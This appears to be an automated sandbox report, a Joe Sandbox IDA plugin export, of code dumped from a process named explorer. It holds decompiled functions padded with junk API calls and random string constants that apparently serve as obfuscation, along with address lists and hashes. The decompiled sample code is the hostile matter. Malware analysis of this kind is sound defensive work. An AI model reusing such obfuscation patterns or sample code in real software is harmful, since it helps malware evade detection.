0x00f55e1b
0x00f55e1c
0x00f55e1e
0x00f55e2c
0x00f55e31
0x00f55e38
0x00f55e39
0x00f55e43
0x00f55e4f
0x00f55e52
0x00f55e57
0x00f55e5a
0x00f55e5c
0x00f55e5e
0x00f55e5e
0x00f55e6b
0x00f55e71
0x00f55e72
0x00f55e75
0x00f55e7c
0x00f55e81
0x00f55e84
0x00f55e84
0x00f55e85
0x00f55e94
0x00f55e9b
0x00f55ea3
0x00f55ea6
0x00f55ea8
0x00f55ea8
0x00f55eb0
0x00f55ebb
0x00f55ec6
0x00f55ecb
0x00f55ed1
0x00000000
0x00f55e87
0x00f55e87
0x00f55e87
0x00f55e8a
0x00f55e8f
0x00f55e8f
0x00000000
0x00f55e8a
0x00f55e85
0x00f55e20
0x00000000
0x00f55e20
0x00f55e03
0x00000000
0x00f55e03
0x00f55dd4
0x00000000
0x00f55dd4
0x00f55d9c
0x00f55da5
0x00f55dad
0x00000000
0x00f55dad
0x00f55d9e
0x00f55da3
0x00000000
0x00000000
0x00000000
0x00f55da3
0x00f55cfb
0x00f55d06
0x00f55d0e
0x00f55d0f
0x00f55d11
0x00f55d13
0x00f55d13
0x00f55d15
0x00f55d18
0x00f55d1b
0x00f55d1d
0x00f55d48
0x00f55d4a
0x00000000
0x00f55d1f
0x00f55d1f
0x00f55d22
0x00f55d27
0x00f55d3a
0x00f55d40
0x00f55d43
0x00f55d43
0x00000000
0x00f55d1f
0x00f55cdd
0x00000000
0x00f55cdd

APIs

GetLastError.KERNEL32(?), ref: 00F55CFB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F55D3A
CreateEnhMetaFileA.GDI32(00000000,ZJzdBgDp 0bdY4 Tyjn0HnEl,zWU pZvsrqKXeJcvvcbCW0Gae3lu03DncW6oM9cv70ZjJejfOv49JtLld.Iyrtn,VLFTZY73mLqFFs1YqP5DiQwnbPI8eWmsE85Ll7FH5 DTH6 7ZJFtTp 0E PG80,u4d8EUFmq PnX.pvX 3LPCLUHvnZTn57lKJVt3XFsbiMOwn5W40Wes5SvnK3C3ral6RyjLlo7E8voz4rou2 vv.urjqx82JiSZsKNvp4Ph,00000000,00000000), ref: 00F55DAD
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,?), ref: 00F55DB7

Strings

E.2dYoc0ha2CLaF xFM6Bwa3epL4g8MXrs0qfPycMQpzuwXb.j 4oc5yHjRNy35mCTKLu9UK Ahuxiqm0ng4f7N2eEGL0oHTaf cg kAS3n2Gx7A5APbYyFwUaniCUWMN,NVEmTqrRl4oFYn.tXnb,0EClpfx5M oi QZDZ3,pzOScVDw4uUFvYc7d9lPbd KfXljKTOvMAKS5nfrQNh62xG.y cWe6ltY2ErU0rRL2Eg,JktMOiKoW5z,MLYYyd6, xrefs: 00F55D01
ZJzdBgDp 0bdY4 Tyjn0HnEl,zWU pZvsrqKXeJcvvcbCW0Gae3lu03DncW6oM9cv70ZjJejfOv49JtLld.Iyrtn,VLFTZY73mLqFFs1YqP5DiQwnbPI8eWmsE85Ll7FH5 DTH6 7ZJFtTp 0E PG80,u4d8EUFmq PnX.pvX 3LPCLUHvnZTn57lKJVt3XFsbiMOwn5W40Wes5SvnK3C3ral6RyjLlo7E8voz4rou2 vv.urjqx82JiSZsKNvp4Ph, xrefs: 00F55DA7

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Create$ByteCharDirectoryErrorFileLastMetaMultiWide
String ID: E.2dYoc0ha2CLaF xFM6Bwa3epL4g8MXrs0qfPycMQpzuwXb.j 4oc5yHjRNy35mCTKLu9UK Ahuxiqm0ng4f7N2eEGL0oHTaf cg kAS3n2Gx7A5APbYyFwUaniCUWMN,NVEmTqrRl4oFYn.tXnb,0EClpfx5M oi QZDZ3,pzOScVDw4uUFvYc7d9lPbd KfXljKTOvMAKS5nfrQNh62xG.y cWe6ltY2ErU0rRL2Eg,JktMOiKoW5z,MLYYyd6$ZJzdBgDp 0bdY4 Tyjn0HnEl,zWU pZvsrqKXeJcvvcbCW0Gae3lu03DncW6oM9cv70ZjJejfOv49JtLld.Iyrtn,VLFTZY73mLqFFs1YqP5DiQwnbPI8eWmsE85Ll7FH5 DTH6 7ZJFtTp 0E PG80,u4d8EUFmq PnX.pvX 3LPCLUHvnZTn57lKJVt3XFsbiMOwn5W40Wes5SvnK3C3ral6RyjLlo7E8voz4rou2 vv.urjqx82JiSZsKNvp4Ph
API String ID: 1537901698-2768367922
Opcode ID: 9ca8138f812577f61d5076c0669af393ab0d00ec66a02681299a11078a7d877d
Instruction ID: 133979ce03e0514b9f21b441a00d22c4c5abf5563fb58b0b05f39726b78b3039
Opcode Fuzzy Hash: 9ca8138f812577f61d5076c0669af393ab0d00ec66a02681299a11078a7d877d
Instruction Fuzzy Hash: 7B51D572C04209BFCF10EFA4DC869EE7778FB04761F20426AFA15A7191D7349A49EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F56358, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00F56358(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				short _v100;
				char _v101;
				char _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _t77;
				void* _t113;
				intOrPtr _t141;
				void* _t142;
				void* _t143;

				_t142 = __edx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v16 = E00F57721(_t77, __ecx, _a4);
				if(_v16 < 0) {
					L5:
					_v24 = E00F57335(_t142,  &_v20,  &_v8);
					_v28 = GetLastError();
					_v32 = E00F5ACD6("qcXQshtGqitfCYr8 NaNPOF4kr464CCxNQDSiTWQHKws,NkM9 kU8snWlLQMZQO8Cmr,Gr,8x.Raa9WwayFav1c g Um7ovm0d LERTyzguUt1G2YHkz6Ssm1E6W7Yh98f4dF7eXwZkv,hRZm4I8fK0D6W0I ,e5n97gscBkx5.A,wdv4oC,Xc0Hx2PzJ YJ6X4ny xRqI01NOHCS9uL,tXPIpWKDQSf9q.W2rfUMa9y2W fRAE10eKcWxMn.X5UR,JimfQ W8 sez0E1 s mEx7J9.EGofaS2AymMNNkVJz.f u 9DIJ8JKuPownKqcxPH1i.qOTCMXE69OfYzaDmYuYmJ2l3u2CcTL0c.qzM1G juQxUrDJjg97q70INGED5fVzqyH w71WwsR 19wFE7KtusD5I41wg9 jibkMGv.GsFfjxXR,GRDBIwUCylmLyIrBUScEkTw3ert6yz77KMRtbX,k.6um8jkX46dH1.SiLQ DlG1isXx0DFvAuNpxDNVa CJoepA51z2,XwI49YSToJ,cNrBWS1z,BCzODjqvbUWUr.5Drd4yhWzyd25i6cgzOKA 1z2gKRq oj4nFZL5yXA1.rzc vV04VHztwa2ZAmziJdl.tP3uTlzopGkl9V9dINrGq03xjWmgOLPT1claADUkU1,ed9ZE7,jEYNc fVT1eY 3QbyAlulVoMD628GG Mkb.1VTHEHU2X7bNzhHXWuViddoq n 1Z58.lGByg MXPJFh,, 25wOlAHMh SrTgJi1wTVLc 0 .s EkeBYcVLOVpwnv2fW.22 Qo2UguqfKNYMhQ.8oiIvUNchE7jrXKZTQADATFf oOFKGF fe vwNnPgxIEEbuzcXzQ1Jwe2f3VI.L8shzdaT7oRoFo hq02PDrWHpr7LCPxrq0UN");
					if(_v32 <= 0xf) {
						_v124 = _v32;
					} else {
						_v124 = 0xf;
					}
					_v120 = _v124;
					_v101 = 0;
					_v28 = _v28 & 0x00000000;
					while(_v28 < _v120) {
						 *((char*)(_t143 + _v28 - 0x70)) = _v28 + 0x42;
						MultiByteToWideChar(0, 0,  &_v116, 0xffffffff,  &_v100, 0x20);
						_v28 = _v28 + 1;
					}
					if(_v24 != 0) {
						_v16 = _v16 & 0x00000000;
						while(_v16 < _v20) {
							if( *((intOrPtr*)(_v24 + _v16 * 0x18)) != _a4) {
								_v16 = _v16 + 1;
								continue;
							}
							while(0 != 0) {
							}
							ArcTo(0, 0x32, 0x59, 0x63, 0x24, 0x23, 0x40, 0x4d, 0x46);
							 *((intOrPtr*)(_v24 + 4 + _v16 * 0x18)) = 1;
							E00F56628( *((intOrPtr*)(_v24 + _v16 * 0x18)),  *((intOrPtr*)(_v24 + 0xc + _v16 * 0x18)),  *((intOrPtr*)(_v24 + 0x10 + _v16 * 0x18)), 0);
							ArcTo(0, 0x4c, 0x5e, 0x27, 0xb, 2, 0x1d, 0x11, 0x51);
							break;
						}
						if(_v16 != _v20) {
							if(E00F56FAF(_t142, _v24, _v20) >= 0) {
								_v12 = 1;
							} else {
								_v12 = 0xfffffffd;
							}
							L29:
							while(0 != 0) {
							}
							E00F5629A(_t142,  &_v24, _v20);
							return _v12;
						}
						while(0 != 0) {
						}
						Arc(0, 0x2c, 0xc, 0x24, 6, 0x5d, 0x1c, 0x49, 0x49);
						_v12 = 0xfffffffc;
						goto L29;
					}
					_t113 = 0xfffffffe;
					return _t113;
				}
				_t141 =  *0xf89778; // 0x0
				if( *((intOrPtr*)(_t141 + (_v16 << 4) + 4)) <= 0) {
					goto L5;
				}
				while(0 != 0) {
				}
				return 1;
			}

0x00f56358
0x00f5635e
0x00f56362
0x00f56366
0x00f5636a
0x00f5636e
0x00f5637b
0x00f56382
0x00f563a5
0x00f563b4
0x00f563bd
0x00f563cb
0x00f563d2
0x00f563e0
0x00f563d4
0x00f563d4
0x00f563d4
0x00f563e6
0x00f563e9
0x00f563ed
0x00f563fa
0x00f5640b
0x00f5641f
0x00f563f7
0x00f563f7
0x00f5642b
0x00f56435
0x00f56442
0x00f5645d
0x00f5643f
0x00000000
0x00f5643f
0x00f5645f
0x00f56463
0x00f56477
0x00f56486
0x00f564b6
0x00f564d0
0x00000000
0x00f564d0
0x00f564e3
0x00f5651b
0x00f56526
0x00f5651d
0x00f5651d
0x00f5651d
0x00000000
0x00f5652d
0x00f56531
0x00f5653a
0x00000000
0x00f56541
0x00f564e5
0x00f564e9
0x00f564fd
0x00f56503
0x00000000
0x00f56503
0x00f5642f
0x00000000
0x00f5642f
0x00f5638a
0x00f56395
0x00000000
0x00000000
0x00f56397
0x00f5639b
0x00000000

APIs

GetLastError.KERNEL32 ref: 00F563B7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F5641F
ArcTo.GDI32(00000000,00000032,00000059,00000063,00000024,00000023,00000040,0000004D,00000046), ref: 00F56477
ArcTo.GDI32(00000000,0000004C,0000005E,00000027,0000000B,00000002,0000001D,00000011,00000051), ref: 00F564D0
Arc.GDI32(00000000,0000002C,0000000C,00000024,00000006,0000005D,0000001C,00000049,00000049), ref: 00F564FD

Strings

qcXQshtGqitfCYr8 NaNPOF4kr464CCxNQDSiTWQHKws,NkM9 kU8snWlLQMZQO8Cmr,Gr,8x.Raa9WwayFav1c g Um7ovm0d LERTyzguUt1G2YHkz6Ssm1E6W7Yh98f4dF7eXwZkv,hRZm4I8fK0D6W0I ,e5n97gscBkx5.A,wdv4oC,Xc0Hx2PzJ YJ6X4ny xRqI01NOHCS9uL,tXPIpWKDQSf9q.W2rfUMa9y2W fRAE10eKcWxMn.X5UR,Ji, xrefs: 00F563C0

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: qcXQshtGqitfCYr8 NaNPOF4kr464CCxNQDSiTWQHKws,NkM9 kU8snWlLQMZQO8Cmr,Gr,8x.Raa9WwayFav1c g Um7ovm0d LERTyzguUt1G2YHkz6Ssm1E6W7Yh98f4dF7eXwZkv,hRZm4I8fK0D6W0I ,e5n97gscBkx5.A,wdv4oC,Xc0Hx2PzJ YJ6X4ny xRqI01NOHCS9uL,tXPIpWKDQSf9q.W2rfUMa9y2W fRAE10eKcWxMn.X5UR,Ji
API String ID: 203985260-2340371664
Opcode ID: 153903dd2ae0eb1d547c09ef47696bca73eb5d51eb31003958ebed399d394646
Instruction ID: 92432ca3e9f6fc5958c4579c77ab77d97b51a9b05e08d27f3a94fd381a9a5f47
Opcode Fuzzy Hash: 153903dd2ae0eb1d547c09ef47696bca73eb5d51eb31003958ebed399d394646
Instruction Fuzzy Hash: 90615071E44209EBEB20CF94DC86BADBBB0EB04316F604059EB25FB1C1D7749A49AF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F560CA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00F560CA(void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				short _v148;
				char _v149;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				signed int _t78;
				void* _t81;
				void* _t116;
				void* _t125;
				void* _t126;

				_t125 = __edx;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v20 = E00F61785(0, _a4, E00F5ACD6(_a4));
				_v28 = E00F57335(_t125,  &_v24,  &_v12);
				_v32 = 0x24;
				_t78 = E00F5ABE5( &_v68, "RfFo4swSQR5 Xofi ZLJKfqRmI7raNdAzXsGDk,5zHKI74VkJdromZyXUtzpvfzHQw1L5P0oA9ScdQrQ7kTN1A7F8ywi3Xzi3Q2vVEFvKF N38uqMouOmpxo7.hBMmswDyTKWqgAQWrSD4y5x3.RMxsbYDHvjwtDWuNuf1nZd7G2WVLUxx4xM2n bH JygCU1bQMI6bu.2W1ukWR60s0 O2dsQn1JLYswZ1OTZ2lYioDIpFCywy0HD YgIxntQ9dV2qHsE3t5rH EjWk1J jprvLO gkfTznDFfLoGW9.ufQzdL B.gwtsBsyprn0W6U GexkMSEg CZRId2ZEr3xS15KY8i1Vb81F.6JwxvwHyjf4mWNeDffvbYDXzV1hhnbpwlIsUNaU BJcM0wvA80TQIJwe6D YlYebHBO0sA6f2o5jBoX8NgO6NFfMF.D aAFsY4t oWBx6bZno4E5.S,y 30cV2WPC74ORaIK0 NCAdvwAyNfiAtdvXzV3bENgIKgnM,zbUxrWrEmB1,x,hn.cSUmSBTptYf76mfcnC06u7sgO4EqDQ 3opiDX7fWNew6i7A5fKd0M tNdduV UA sM32t4d9sUVsLA6o6p Up7o3gw8 OucRq2ysIi iQB9 Bu.MGjJOum0iVcFIt4j0nmVtRRa4FmH,RKTK1g4IzOmD82tloNb11UT4nV,1DLd8CACig9iHr0DJ9,DJ k183Tpn7,,a040 MOkdWBq0vxCkDpL7TnYorTQWJVjfJeq9yLPorWWqBAxjMN FkW1hrXizN2Swc5BlD z7V16D oSfEgNKFRhdV8Yh 7wN05ZM77jw Edjvx5 VEpIpx0Sdq 0 JjpWsY8GSd1BundthYtMunpfhliPqD.Z2OPZ7u em dOcgKWZ9DjLy 9rmNtd,PzYDQTo001RhjYk4T6xIKFbqdqjY3k55H4L3eAY9KILo8r2JrdpDsmIdsi4  WmB59wemJSLyxBm449cnLVt4Cns3BNEh 1gGWfsp", _v32);
				_v72 = _t78;
				if(_v28 != 0) {
					_v16 = _v16 & 0x00000000;
					while(_v16 < _v24) {
						if( *((intOrPtr*)(_v28 + _v16 * 0x18)) != _v20) {
							_v16 = _v16 + 1;
							continue;
						}
						 *(_v28 + 0x14 + _v16 * 0x18) = 1;
						while(0 != 0) {
						}
						break;
					}
					if(_v16 != _v24) {
						_t81 = E00F56FAF(_t125, _v28, _v24);
						_pop(_t116);
						if(_t81 < 0) {
							_v8 = 0xfffffffe;
						}
						_v76 = _v76 & 0x00000000;
						_v76 = E00F57721(_t81, _t116, _v20);
						if(_v76 >= 0) {
							E00F577A7(_v76);
						}
						L19:
						E00F5629A(_t125,  &_v28, _v24);
						_v80 = GetLastError();
						_v84 = E00F5ACD6("DqMxzC641gQARe3HALia,XKf l2jbxmNMp SKz5KHqS bDp y ah47Js93 iXP zS7LqKvQ6w,sfWgRO4DaETISDxSVx0vZdI6RU0yv7sREmS25gLyI5OYGSTN71e079c5ae.DbQDpNclTsE2u.NchsnRjvyMazX4NdojTkXIlwM,MVVVg0peGnoCAbSU");
						if(_v84 <= 0xf) {
							_v172 = _v84;
						} else {
							_v172 = 0xf;
						}
						_v168 = _v172;
						_v149 = 0;
						_v80 = _v80 & 0x00000000;
						while(_v80 < _v168) {
							 *((char*)(_t126 + _v80 - 0xa0)) = _v80 + 0x42;
							MultiByteToWideChar(0, 0,  &_v164, 0xffffffff,  &_v148, 0x20);
							_v80 = _v80 + 1;
						}
						BitBlt(0, 0x2e, 0x13, 0x46, 0x15, 0, 1, 2, 0x23);
						return _v8;
					}
					while(0 != 0) {
					}
					goto L19;
				}
				return _t78 | 0xffffffff;
			}

0x00f560ca
0x00f560d3
0x00f560d7
0x00f560db
0x00f560df
0x00f560e3
0x00f560fd
0x00f5610f
0x00f56112
0x00f56125
0x00f5612d
0x00f56134
0x00f5613e
0x00f5614b
0x00f56162
0x00f56148
0x00000000
0x00f56148
0x00f5616d
0x00f56175
0x00f56179
0x00000000
0x00f5617b
0x00f56185
0x00f56195
0x00f5619b
0x00f5619e
0x00f561a0
0x00f561a0
0x00f561a7
0x00f561b4
0x00f561bb
0x00f561c0
0x00f561c5
0x00f561c6
0x00f561cd
0x00f561da
0x00f561e8
0x00f561ef
0x00f56200
0x00f561f1
0x00f561f1
0x00f561f1
0x00f5620c
0x00f56212
0x00f56219
0x00f56226
0x00f5623a
0x00f56257
0x00f56223
0x00f56223
0x00f56271
0x00000000
0x00f56277
0x00f56187
0x00f5618b
0x00000000
0x00f5618d
0x00000000

APIs

GetLastError.KERNEL32 ref: 00F561D4
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F56257
BitBlt.GDI32(00000000,0000002E,00000013,00000046,00000015,00000000,00000001,00000002,00000023), ref: 00F56271

Strings

DqMxzC641gQARe3HALia,XKf l2jbxmNMp SKz5KHqS bDp y ah47Js93 iXP zS7LqKvQ6w,sfWgRO4DaETISDxSVx0vZdI6RU0yv7sREmS25gLyI5OYGSTN71e079c5ae.DbQDpNclTsE2u.NchsnRjvyMazX4NdojTkXIlwM,MVVVg0peGnoCAbSU, xrefs: 00F561DD
$, xrefs: 00F56112
RfFo4swSQR5 Xofi ZLJKfqRmI7raNdAzXsGDk,5zHKI74VkJdromZyXUtzpvfzHQw1L5P0oA9ScdQrQ7kTN1A7F8ywi3Xzi3Q2vVEFvKF N38uqMouOmpxo7.hBMmswDyTKWqgAQWrSD4y5x3.RMxsbYDHvjwtDWuNuf1nZd7G2WVLUxx4xM2n bH JygCU1bQMI6bu.2W1ukWR60s0 O2dsQn1JLYswZ1OTZ2lYioDIpFCywy0HD YgIxntQ9dV2qH, xrefs: 00F5611C

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: $$DqMxzC641gQARe3HALia,XKf l2jbxmNMp SKz5KHqS bDp y ah47Js93 iXP zS7LqKvQ6w,sfWgRO4DaETISDxSVx0vZdI6RU0yv7sREmS25gLyI5OYGSTN71e079c5ae.DbQDpNclTsE2u.NchsnRjvyMazX4NdojTkXIlwM,MVVVg0peGnoCAbSU$RfFo4swSQR5 Xofi ZLJKfqRmI7raNdAzXsGDk,5zHKI74VkJdromZyXUtzpvfzHQw1L5P0oA9ScdQrQ7kTN1A7F8ywi3Xzi3Q2vVEFvKF N38uqMouOmpxo7.hBMmswDyTKWqgAQWrSD4y5x3.RMxsbYDHvjwtDWuNuf1nZd7G2WVLUxx4xM2n bH JygCU1bQMI6bu.2W1ukWR60s0 O2dsQn1JLYswZ1OTZ2lYioDIpFCywy0HD YgIxntQ9dV2qH
API String ID: 203985260-1212634524
Opcode ID: c630d455f000d58b90e1eac065fae482d88a9a41f88fef038031535221ebe4bb
Instruction ID: 4e7701236662ae2014ba4be34612093dc9847635de93d5fadfe236116d874328
Opcode Fuzzy Hash: c630d455f000d58b90e1eac065fae482d88a9a41f88fef038031535221ebe4bb
Instruction Fuzzy Hash: 1C516C71E04209EFDF10DFA4DC45BADBBB4BB04326F604155EA24EB182D7749A89AF41

Uniqueness

Uniqueness Score: -1.00%

Function 00F51E51, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00F51E51(intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v17;
				char _v32;
				short _v96;
				void* __esi;
				void* _t29;
				char _t30;
				void* _t41;
				char _t50;
				char _t51;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;

				_t52 = _a4;
				_t26 =  *_a4;
				_t50 = 0;
				_v8 = 0;
				_v12 = 0;
				if( *_a4 != 0) {
					_v8 = E00F5B8AE( *((intOrPtr*)(_t52 + 4)), _t26);
					GetLastError();
					_t29 = E00F5ACD6("0ek3dKx6rgvvX5ttoyP7hPOjs99C4ph wea5XQ50viiohoVPu66hNc bD1hx7zAAmdJ58owC,p xgWRD.fXlZP.6gxs,KKSeLveqej Skhkzorq KMnhj hTH0xk1Mvv.jRrqx5ytzkMCWf,JKgV1cwNvfE42sgtIMit.dOlHS0CcKlsGnkNf6etsuJnAOGEMf5yIhpn4QM5ox5aD uc4BvlUI02RoSaXi3RY8J,K 50.jI ZeVU7 Ybwu3JzYSkF FsQCL9s0BHFUp2FimLmp9BQwt gg0zddhPppfxHtT2RAaJLFXuTHJOOJbCBZ DqSkFqQNzXfzFqP4GmAqRwGYlsCUBpsm1G ,8xmLEqJKpIMSENZfqCcbYKzeqV5GprLAEozuvuOeVwVRxUCZlB4ObpcpKl7pyMOgyGQr .hqmG4qYL,pacvwRdypWDoDIPonW yw5aLAJ9Gt4F8 iN7EaWYnpBUFQGRllgc.iQ9ItGP5U5MNl7kTxho9BHpXiO.z5yCcGcDeDWQEY8kfZyjA 7n Cv EwHkPm,PBKzTXtP7e5AuN 2ffP6hv2n0JBo.V qYjrbMBon jAqI L w9zYJPBOQpwvUKQh0hyYLDiyTdw3aYD5vJxYEugW i.ahN8q");
					_t63 = 0xf;
					if(_t29 <= _t63) {
						_t63 = _t29;
					}
					_t60 = MultiByteToWideChar;
					_v17 = _t50;
					if(_t63 > _t50) {
						do {
							_t7 = _t50 + 0x42; // 0x42
							 *((char*)(_t66 + _t50 - 0x1c)) = _t7;
							MultiByteToWideChar(0, 0,  &_v32, 0xffffffff,  &_v96, 0x20);
							_t50 = _t50 + 1;
						} while (_t50 < _t63);
					}
					_t51 = 0;
					if(_v8 != 0) {
						_t30 = E00F5B550(_v8);
						_v16 = _t30;
						if(_t30 == 0) {
							_push(0xfffffffc);
							goto L15;
						} else {
							E00F5BAA0(_t30,  &_v12, 0, 1);
							asm("sbb edi, edi");
							_t61 = (_t60 & 0x00000003) + 0xfffffffd;
							E00F5AB81( &_v16, 0xfffffffe);
							_t67 = _t67 + 0x18;
						}
					} else {
						GetLastError();
						_t41 = E00F5ACD6("4DBYj7Gpe .qmX, xLx 4WDH vs5 Um84exCK9XJ8uSd,Tlv ,9hgaDwWeW5iZdin b.i332OWdyV,V.tlApEOBmxE3FNGZoX.PwQCHFuv4VdzJbtH GKkUFTPJbbu, q L0z8BqnE zWpI9 5LAl0lv.vDGXuUr8mOW4uX4iH4UVVtL8c9MoLg.sHSx,Hc.3 iIuLrbicYCkYsGWj5v4 wbwvd,1mTk eAwOq,BJ7WzMagMRkaxeK y3eTIOEES G jjRTdfIX5kNNwVFf2VkSFFJPD5gFMiLXh0NzpimXZzM PbKDYS9kcFpgCnr55IcSCe fL5NsF5gLgOG8YEp,TtSByy ZdagQK Ee4eppX lLEhSzmMaoib4zJKgr4dZ42ouzl9RoF8Zl.eWukLQGWJ7l7q0NINsCIfTM1KmMxbBO UfJwOgugOmVpLM ha8fXu5ukMcyIfPMlpVDtHOdmPTxG9c20Z6hgONe79ztd9U5K,z3tddCp,Z0Qxr le0Grp 6ncaxg BpbZ3d z,73EGUiuRbFWzE5pZE5YJQAqFwtDBFFDu6ee AY2IZ0zaarfwZFmD5NZtQD0LU8ybY2NS78zPw,jbMuNmu3X");
						_t65 = 0xf;
						if(_t41 <= _t65) {
							_t65 = _t41;
						}
						_v17 = _t51;
						if(_t65 != 0) {
							do {
								_t14 = _t51 + 0x42; // 0x42
								 *((char*)(_t66 + _t51 - 0x1c)) = _t14;
								MultiByteToWideChar(0, 0,  &_v32, 0xffffffff,  &_v96, 0x20);
								_t51 = _t51 + 1;
							} while (_t51 < _t65);
						}
						_push(0xfffffffe);
						L15:
						_pop(_t61);
					}
				} else {
					_t61 = _t59 | 0xffffffff;
				}
				E00F5AB81( &_v8, 0xffffffff);
				E00F5B78C(_a4, _a4 + 4);
				return _t61;
			}

0x00f51e57
0x00f51e5a
0x00f51e5d
0x00f51e61
0x00f51e64
0x00f51e69
0x00f51e7e
0x00f51e81
0x00f51e8c
0x00f51e94
0x00f51e97
0x00f51e99
0x00f51e99
0x00f51e9b
0x00f51ea1
0x00f51ea6
0x00f51ea8
0x00f51eaa
0x00f51ead
0x00f51ebf
0x00f51ec1
0x00f51ec2
0x00f51ea8
0x00f51ec6
0x00f51ecb
0x00f51f13
0x00f51f19
0x00f51f1e
0x00f51f47
0x00000000
0x00f51f20
0x00f51f28
0x00f51f2f
0x00f51f3a
0x00f51f3d
0x00f51f42
0x00f51f42
0x00f51ecd
0x00f51ecd
0x00f51ed8
0x00f51ee0
0x00f51ee3
0x00f51ee5
0x00f51ee5
0x00f51ee7
0x00f51eec
0x00f51eee
0x00f51ef0
0x00f51ef3
0x00f51f05
0x00f51f07
0x00f51f08
0x00f51eee
0x00f51f0c
0x00f51f49
0x00f51f49
0x00f51f49
0x00f51e6b
0x00f51e6b
0x00f51e6b
0x00f51f50
0x00f51f5c
0x00f51f6a

APIs

GetLastError.KERNEL32 ref: 00F51E81
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F51EBF
GetLastError.KERNEL32 ref: 00F51ECD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F51F05

Strings

0ek3dKx6rgvvX5ttoyP7hPOjs99C4ph wea5XQ50viiohoVPu66hNc bD1hx7zAAmdJ58owC,p xgWRD.fXlZP.6gxs,KKSeLveqej Skhkzorq KMnhj hTH0xk1Mvv.jRrqx5ytzkMCWf,JKgV1cwNvfE42sgtIMit.dOlHS0CcKlsGnkNf6etsuJnAOGEMf5yIhpn4QM5ox5aD uc4BvlUI02RoSaXi3RY8J,K 50.jI ZeVU7 Ybwu3JzYSkF Fs, xrefs: 00F51E87
4DBYj7Gpe .qmX, xLx 4WDH vs5 Um84exCK9XJ8uSd,Tlv ,9hgaDwWeW5iZdin b.i332OWdyV,V.tlApEOBmxE3FNGZoX.PwQCHFuv4VdzJbtH GKkUFTPJbbu, q L0z8BqnE zWpI9 5LAl0lv.vDGXuUr8mOW4uX4iH4UVVtL8c9MoLg.sHSx,Hc.3 iIuLrbicYCkYsGWj5v4 wbwvd,1mTk eAwOq,BJ7WzMagMRkaxeK y3eTIOEES G j, xrefs: 00F51ED3

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: 0ek3dKx6rgvvX5ttoyP7hPOjs99C4ph wea5XQ50viiohoVPu66hNc bD1hx7zAAmdJ58owC,p xgWRD.fXlZP.6gxs,KKSeLveqej Skhkzorq KMnhj hTH0xk1Mvv.jRrqx5ytzkMCWf,JKgV1cwNvfE42sgtIMit.dOlHS0CcKlsGnkNf6etsuJnAOGEMf5yIhpn4QM5ox5aD uc4BvlUI02RoSaXi3RY8J,K 50.jI ZeVU7 Ybwu3JzYSkF Fs$4DBYj7Gpe .qmX, xLx 4WDH vs5 Um84exCK9XJ8uSd,Tlv ,9hgaDwWeW5iZdin b.i332OWdyV,V.tlApEOBmxE3FNGZoX.PwQCHFuv4VdzJbtH GKkUFTPJbbu, q L0z8BqnE zWpI9 5LAl0lv.vDGXuUr8mOW4uX4iH4UVVtL8c9MoLg.sHSx,Hc.3 iIuLrbicYCkYsGWj5v4 wbwvd,1mTk eAwOq,BJ7WzMagMRkaxeK y3eTIOEES G j
API String ID: 203985260-2258012554
Opcode ID: 305b59c34779b5515753ebf0787f7248a04c42564669e07d55414b652b696724
Instruction ID: b8db5f62eff575500fc06c73e039e41ad988ed6d9c2b3f17bd3ddffe93e607b9
Opcode Fuzzy Hash: 305b59c34779b5515753ebf0787f7248a04c42564669e07d55414b652b696724
